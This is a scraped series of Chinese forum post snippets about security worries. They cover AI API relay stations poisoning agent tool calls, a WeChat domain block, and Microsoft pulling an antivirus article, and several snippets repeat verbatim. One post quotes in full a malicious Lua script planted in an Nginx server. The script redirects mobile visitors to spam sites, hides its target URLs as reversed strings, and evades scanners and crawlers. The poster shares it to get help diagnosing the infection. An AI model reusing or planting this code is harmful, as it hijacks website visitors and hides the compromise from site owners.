随便试了一个问题,就报了这个问题,你们会出现吗:Fable 5’s safety measures flagged this message for cybersecurity or biology topics. They may flag safe, normal content as well. These measures let us bring you Mythos-level capability in other areas sooner, and we’re working to refine them. Switched to Opus 4.8 5 个帖子 - 2 位参与者 阅读完整话题
起因是我自己已经经过 icp 备案的网站域名,在微信里打开,却提示: 于是拼命寻找人工,未果,无论是打电话还是找在线客服,都没有联系上人工。 听别人说微信检测比较延后,但是我都快备案成功一个月了。 最终找到一个方法,就是需要向 微信 那边发送邮件,格式是: 收件人:[email protected] 标题:【链接解封反馈】<你的姓名>,<你的域名> 域名被误检测 内容是: <你的域名>已经备案过,但是在微信里打开提示“未完成网站备案”,请麻烦核实并解封。<下面附上你在备案管理系统查询的备案信息的截图> 2 个帖子 - 2 位参与者 阅读完整话题
相信大家都了解过中转站投毒 https://linux.do/t/topic/2219252 我又看到文章, 说computer use可能会借你的登录态完成危险操作 用 Compute Use之前,务必先设好这六条安全边界,以避免惨剧发生 我于是将这两篇文章结合起来,产生了一个想法:如果你是通过中转来使用codex的computer use插件的话,是否会有更严重的安全问题? 或许还是说是我庸人自扰? 2 个帖子 - 2 位参与者 阅读完整话题
今天买了一个中转的 api 用,老是感觉安全性不够,大家觉得中转站还有哪些令人担忧问题? 9 个帖子 - 9 位参与者 阅读完整话题
微软已悄然删除此前发布的一篇有关 Windows 11 安全性的长文,不再公开宣称系统自带的安全功能足以满足大多数用户的防护需求。 这篇题为《2026 年最佳杀毒软件:你需要的 Windows 内置防护》的博文原本刊登在微软 Windows 学习中心网站上,重点强调 Windows 11 集成的各类安全功能,暗示普通用户无需再安装第三方杀毒软件。 目前,该页面已被撤下并重定向至学习中心首页,微软方面尚未就此变动给出公开说明。 据第三方测试机构 AV-Comparatives 以及社区人士的追踪,这篇文章最初发布于 4 月 9 日,至少在 5 月 11 日仍可访问。 通过互联网档案网站的快照可以看到,到了 5 月 24 日,该文章已从官网消失,原链接此后会直接跳转到微软 Windows 学习中心主页,而非原有内容。 有观察人士指出,这一调整发生得相当低调,微软并未同步发布任何公告或更正说明。 在被删除的内容中,微软详细介绍了多项内置安全功能,包括 Microsoft Defender Antivirus、Microsoft Defender SmartScreen、Smart App Control 以及原生的勒索软件防护机制等。 争议焦点在于文章中对“是否还需要第三方杀毒软件”的表述:微软声称,对很多 Windows 11 用户而言,只要开启默认保护、定期更新系统并谨慎下载软件,Defender 和 SmartScreen 已能覆盖日常风险,如恶意文件、钓鱼网站和不安全安装程序。 文中同时表示,是否额外安装第三方安全软件应取决于用户使用场景和所看重的附加功能。 还有一些“适合考虑额外安全工具”的情况,比如需要统一管理多台设备、与家人共享设备,或希望获得身份监控、家长控制等增值服务。 不过,微软强调,每多安装一款安全工具,系统后台活动和整体复杂度都会提升,因此建议用户“根据真实需求谨慎选择”。 这种整体措辞被外界解读为微软在官方层面弱化第三方杀毒软件的重要性,强调自家安全生态的完整性。 尽管不少 Windows 11 用户(包括部分业内人士)确实只依赖系统自带防护而不额外安装杀毒软件,但微软用官方内容明确传递“不一定需要第三方”的立场,可能会令长期合作的安全厂商感到不满。 对于依靠 Windows 平台生态生存的安全公司而言,这类表述既可能被视为竞争压力,也可能影响普通用户对独立安全产品价值的认知。 查看评论
我们的业务主要是web + 软件,没有怎么管移动端,导致这次nginx被植入了病毒都不知道, 具体的病毒就是访问网站移动端检测是苹果手机或者安卓手机就劫持然后跳垃圾网站 codex解析出来的 移动端请求进入网站的 Nginx Nginx 全局 proxy.conf 里被插入了waf.lua waf.lua 读取 User-Agent,如果是 Android/iPhone,就随机跳转到: https://随机子域.histats.cfd/news.html 4.它还会设置: Set-Cookie: k=260528;Path=/;Max-Age=43200 意思是“当天已经劫持过一次”,后续可能放行,降低被发现概率。 附上被植入的脚本 local U = ngx.var.http_user_agent or “” local K = ngx.var.http_cookie or “” local S = os.date(“%y%m%d”) local ua_lc = U:lower() local cn_spiders = { “baiduspider”, “360spider”, “sogouspider”, “shenmaspider”, “petalbot”, “bytedancespider”, “toutiaospider”, “quarkspider”, “yisouspider”, “zoomeye”, “quake”, “fofa”, “hunter”, “chaitin”, “inetcloud”, “dnslog”, } local function is_cn_spider(ua) if ua == “” then return false end for _, pattern in ipairs(cn_spiders) do if ua:find(pattern, 1, true) then return true end end return false end if is_cn_spider(ua_lc) then return ngx.exit(ngx.HTTP_FORBIDDEN) end local is_android = ua_lc:find(“android”) local is_iphone = ua_lc:find(“iphone”) if not (is_android or is_iphone) then return end if K:find(“k=” .. S) then return end ngx.header[“Set-Cookie”] = “k=” .. S .. “;Path=/;Max-Age=43200” if is_iphone and math.random() >= 0.3 then return end local R1 = “lmth.swen/piv.ssoqj//:sptth” local R2 = “lmth.swen/dfc.statsih//:sptth” local function rev(s) return s and string.reverse(s) or “” end local D1 = rev(R1) local D2 = rev(R2) local function strip_proto(full) return full:gsub(“^https?://”, “”) end local H1 = strip_proto(D1) local H2 = strip_proto(D2) local alpha = “abcdefghijklmnopqrstuvwxyz0123456789” local function rand_pref(len) local t = {} for i = 1, len do local idx = math.random(1, #alpha ) t[i] = alpha:sub(idx, idx) end return table.concat(t) end local pool = {H1, H2} local pick = pool[math.random(1, #pool )] or H1 local pref = rand_pref(math.random(3, 7)) local target = “https://” .. pref .. “.” .. pick return ngx.redirect(target, 302) 其实很无奈,不会运维,codex确实棒了大忙,但是nginx这么容易被植入病毒吗? 求运维大佬解惑 3 个帖子 - 3 位参与者 阅读完整话题
看了一个这个: https://www.bilibili.com/video/BV1ZmG46MEut 有点焦虑,Agent 一个操作就是几百个工具调用,几十个 exec 没人会一个一个审核吧,太容易中毒了。 里面翻倍,注水我都能忍,但是安全性如何保证,比如偷偷的把某个 tool calling 的改成 exec 命令执行 npx vite-build-xxx 然后 vite-build-xxx 其实是中转站 push 上去的一个恶意程序怎么办。
看了一个这个: https://www.bilibili.com/video/BV1ZmG46MEut 有点焦虑,Agent 一个操作就是几百个工具调用,几十个 exec 没人会一个一个审核吧,太容易中毒了。 里面翻倍,注水我都能忍,但是安全性如何保证,比如偷偷的把某个 tool calling 的改成 exec 命令执行 npx vite-build-xxx 然后 vite-build-xxx 其实是中转站 push 上去的一个恶意程序怎么办。
看了一个这个: https://www.bilibili.com/video/BV1ZmG46MEut 有点焦虑,Agent 一个操作就是几百个工具调用,几十个 exec 没人会一个一个审核吧,太容易中毒了。 里面翻倍,注水我都能忍,但是安全性如何保证,比如偷偷的把某个 tool calling 的改成 exec 命令执行 npx vite-build-xxx 然后 vite-build-xxx 其实是中转站 push 上去的一个恶意程序怎么办。
看了一个这个: https://www.bilibili.com/video/BV1ZmG46MEut 有点焦虑,Agent 一个操作就是几百个工具调用,几十个 exec 没人会一个一个审核吧,太容易中毒了。 里面翻倍,注水我都能忍,但是安全性如何保证,比如偷偷的把某个 tool calling 的改成 exec 命令执行 npx vite-build-xxx 然后 vite-build-xxx 其实是中转站 push 上去的一个恶意程序怎么办。
看了一个这个: https://www.bilibili.com/video/BV1ZmG46MEut 有点焦虑,Agent 一个操作就是几百个工具调用,几十个 exec 没人会一个一个审核吧,太容易中毒了。 里面翻倍,注水我都能忍,但是安全性如何保证,比如偷偷的把某个 tool calling 的改成 exec 命令执行 npx vite-build-xxx 然后 vite-build-xxx 其实是中转站 push 上去的一个恶意程序怎么办。
想问一下这种号能用几天,成本以及安全性怎么样 22 个帖子 - 10 位参与者 阅读完整话题
如题,我也用了很多中转站,也充了钱,确实比订阅要便宜一些。 我知道中转站可能会有安全风险,数据窃取,中间人攻击等。 但是它便宜啊! 现在大家伙有有没有好的办法可以检测中转站是否安全?让我可以放心的用。
如题,我也用了很多中转站,也充了钱,确实比订阅要便宜一些。 我知道中转站可能会有安全风险,数据窃取,中间人攻击等。 但是它便宜啊! 现在大家伙有有没有好的办法可以检测中转站是否安全?让我可以放心的用。
如题,我也用了很多中转站,也充了钱,确实比订阅要便宜一些。 我知道中转站可能会有安全风险,数据窃取,中间人攻击等。 但是它便宜啊! 现在大家伙有有没有好的办法可以检测中转站是否安全?让我可以放心的用。
如题,我也用了很多中转站,也充了钱,确实比订阅要便宜一些。 我知道中转站可能会有安全风险,数据窃取,中间人攻击等。 但是它便宜啊! 现在大家伙有有没有好的办法可以检测中转站是否安全?让我可以放心的用。
如题,我也用了很多中转站,也充了钱,确实比订阅要便宜一些。 我知道中转站可能会有安全风险,数据窃取,中间人攻击等。 但是它便宜啊! 现在大家伙有有没有好的办法可以检测中转站是否安全?让我可以放心的用。
如题,我也用了很多中转站,也充了钱,确实比订阅要便宜一些。 我知道中转站可能会有安全风险,数据窃取,中间人攻击等。 但是它便宜啊! 现在大家伙有有没有好的办法可以检测中转站是否安全?让我可以放心的用。
如题,我也用了很多中转站,也充了钱,确实比订阅要便宜一些。 我知道中转站可能会有安全风险,数据窃取,中间人攻击等。 但是它便宜啊! 现在大家伙有有没有好的办法可以检测中转站是否安全?让我可以放心的用。
如题,我也用了很多中转站,也充了钱,确实比订阅要便宜一些。 我知道中转站可能会有安全风险,数据窃取,中间人攻击等。 但是它便宜啊! 现在大家伙有有没有好的办法可以检测中转站是否安全?让我可以放心的用。